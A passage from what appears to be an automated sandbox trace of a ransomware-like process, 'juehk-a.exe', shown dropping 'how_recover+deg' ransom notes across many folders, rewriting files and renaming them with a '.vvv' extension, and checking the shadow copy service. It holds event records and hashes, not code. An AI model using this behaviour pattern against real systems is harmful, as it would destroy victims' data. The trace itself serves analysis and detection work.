- fid (ads:): 562949953521033
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47517
- mode: close
- sequenceNumber: 567
- value: C:\Boot\zh-CN\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521033
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47569
- mode: created
- sequenceNumber: 568
- value: C:\Boot\zh-CN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521034
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47574
- mode: close
- sequenceNumber: 569
- value: C:\Boot\zh-CN\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521034
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47580
- mode: created
- sequenceNumber: 570
- value: C:\Boot\zh-HK\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521035
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47586
- mode: close
- sequenceNumber: 571
- value: C:\Boot\zh-HK\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521035
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47610
- mode: created
- sequenceNumber: 572
- value: C:\Boot\zh-HK\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521036
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47614
- mode: close
- sequenceNumber: 573
- value: C:\Boot\zh-HK\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521036
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47619
- mode: created
- sequenceNumber: 574
- value: C:\Boot\zh-TW\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521037
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47624
- mode: close
- sequenceNumber: 575
- value: C:\Boot\zh-TW\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521037
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47630
- mode: created
- sequenceNumber: 576
- value: C:\Boot\zh-TW\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521038
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47635
- mode: close
- sequenceNumber: 577
- value: C:\Boot\zh-TW\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521038
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47639
- mode: created
- sequenceNumber: 578
- value: C:\Boot\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521039
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47683
- mode: close
- sequenceNumber: 579
- value: C:\Boot\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521039
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47689
- mode: created
- sequenceNumber: 580
- value: C:\Boot\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521040
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47693
- mode: close
- sequenceNumber: 581
- value: C:\Boot\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521040
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47697
- mode: failed
- sequenceNumber: 582
- value: C:\Documents and Settings
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x200021
- file:
- timestamp: 47700
- mode: created
- sequenceNumber: 583
- value: C:\Users\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521041
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47704
- mode: close
- sequenceNumber: 584
- value: C:\Users\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521041
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47709
- mode: created
- sequenceNumber: 585
- value: C:\Users\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521042
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47712
- mode: close
- sequenceNumber: 586
- value: C:\Users\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521042
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47743
- mode: open
- sequenceNumber: 587
- value: C:\eula.1028.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519967
- ntstatus: 0x0
- CreateOptions: 0x60
- uac:
- timestamp: 47793
- mode: service
- sequenceNumber: 588
- value: Microsoft Software Shadow Copy Provider
- status: running
- apicall:
- timestamp: 47925
- repeat: 80
- sequenceNumber: 589
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 48243
- mode: close
- sequenceNumber: 590
- value: C:\eula.1028.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519967
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 48353
- mode: rename
- sequenceNumber: 591
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1028.txt
- new_name: C:\eula.1028.txt.vvv
- ads:
- fid (ads:): 562949953519967
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 48475
- mode: open
- sequenceNumber: 592
- value: C:\eula.1031.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519968
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 48784
- repeat: 90
- sequenceNumber: 593
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 48851
- mode: close
- sequenceNumber: 594
- value: C:\eula.1031.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519968
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 48885
- mode: rename
- sequenceNumber: 595
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1031.txt
- new_name: C:\eula.1031.txt.vvv
- ads:
- fid (ads:): 562949953519968
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 48892
- mode: open
- sequenceNumber: 596
- value: C:\eula.1033.txt
- filesize: 10134
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519969
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 48935
- mode: close
- sequenceNumber: 597
- value: C:\eula.1033.txt
- filesize: 10558
- md5sum: 98d5c708eb7dc0eb5224954b3c577c62
- sha1sum: 339c2094d53cddebf80e335d537b44646cbeec0f
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519969
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 48946
- mode: rename
- sequenceNumber: 598
- filesize: 10558
- md5sum: 98d5c708eb7dc0eb5224954b3c577c62
- sha1sum: 339c2094d53cddebf80e335d537b44646cbeec0f
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1033.txt
- new_name: C:\eula.1033.txt.vvv
- ads:
- fid (ads:): 562949953519969
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 48963
- mode: open
- sequenceNumber: 599
- value: C:\eula.1036.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519971
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 49216
- mode: close
- sequenceNumber: 600
- value: C:\eula.1036.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519971
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 49243
- mode: rename
- sequenceNumber: 601
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1036.txt
- new_name: C:\eula.1036.txt.vvv
- ads:
- fid (ads:): 562949953519971
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 49351
- mode: open
- sequenceNumber: 602
- value: C:\eula.1040.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519972
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 49704
- repeat: 100
- sequenceNumber: 603
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 49946
- mode: close
- sequenceNumber: 604
- value: C:\eula.1040.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519972
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 49953
- mode: rename
- sequenceNumber: 605
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1040.txt
- new_name: C:\eula.1040.txt.vvv
- ads:
- fid (ads:): 562949953519972
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 49974
- mode: open
- sequenceNumber: 606
- value: C:\eula.1041.txt
- filesize: 118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519973
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 50138
- mode: close
- sequenceNumber: 607
- value: C:\eula.1041.txt
- filesize: 542
- md5sum: d15fc8b6fc6bde19174233e913f55fcd
- sha1sum: 0963b5f0f8862d37db1c9c8699ecb81c7d74c2ee
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519973
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 50151
- mode: rename
- sequenceNumber: 608
- filesize: 542
- md5sum: d15fc8b6fc6bde19174233e913f55fcd
- sha1sum: 0963b5f0f8862d37db1c9c8699ecb81c7d74c2ee
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1041.txt
- new_name: C:\eula.1041.txt.vvv
- ads:
- fid (ads:): 562949953519973
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 50211
- mode: open
- sequenceNumber: 609
- value: C:\eula.1042.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519974
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 50608
- mode: close
- sequenceNumber: 610
- value: C:\eula.1042.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519974
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 50666
- mode: rename
- sequenceNumber: 611
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.1042.txt
- new_name: C:\eula.1042.txt.vvv
- ads:
- fid (ads:): 562949953519974
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 50713
- mode: open
- sequenceNumber: 612
- value: C:\eula.2052.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519966
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 50960
- mode: close
- sequenceNumber: 613
- value: C:\eula.2052.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519966
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51021
- mode: rename
- sequenceNumber: 614
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.2052.txt
- new_name: C:\eula.2052.txt.vvv
- ads:
- fid (ads:): 562949953519966
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51084
- mode: open
- sequenceNumber: 615
- value: C:\eula.3082.txt
- filesize: 17734
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519970
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51389
- mode: close
- sequenceNumber: 616
- value: C:\eula.3082.txt
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519970
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51421
- mode: rename
- sequenceNumber: 617
- filesize: 18158
- md5sum: 59b7c2120d1cfc81c66609e84d202bdf
- sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\eula.3082.txt
- new_name: C:\eula.3082.txt.vvv
- ads:
- fid (ads:): 562949953519970
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51486
- mode: created
- sequenceNumber: 618
- value: C:\exec\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521043
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51491
- mode: close
- sequenceNumber: 619
- value: C:\exec\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521043
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51498
- mode: created
- sequenceNumber: 620
- value: C:\exec\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521044
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51502
- mode: close
- sequenceNumber: 621
- value: C:\exec\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521044
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51507
- mode: find
- sequenceNumber: 622
- value: C:\MSOCache\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51510
- mode: find
- sequenceNumber: 623
- value: C:\MSOCache\*\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51515
- mode: created
- sequenceNumber: 624
- value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521045
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51522
- mode: close
- sequenceNumber: 625
- value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521045
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51528
- mode: created
- sequenceNumber: 626
- value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521046
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51534
- mode: close
- sequenceNumber: 627
- value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521046
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51542
- mode: created
- sequenceNumber: 628
- value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521047
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51547
- mode: close
- sequenceNumber: 629
- value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521047
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51571
- mode: created
- sequenceNumber: 630
- value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521048
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51578
- mode: close
- sequenceNumber: 631
- value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521048
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51648
- mode: created
- sequenceNumber: 632
- value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521049
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51663
- mode: close
- sequenceNumber: 633
- value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521049
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51670
- mode: created
- sequenceNumber: 634
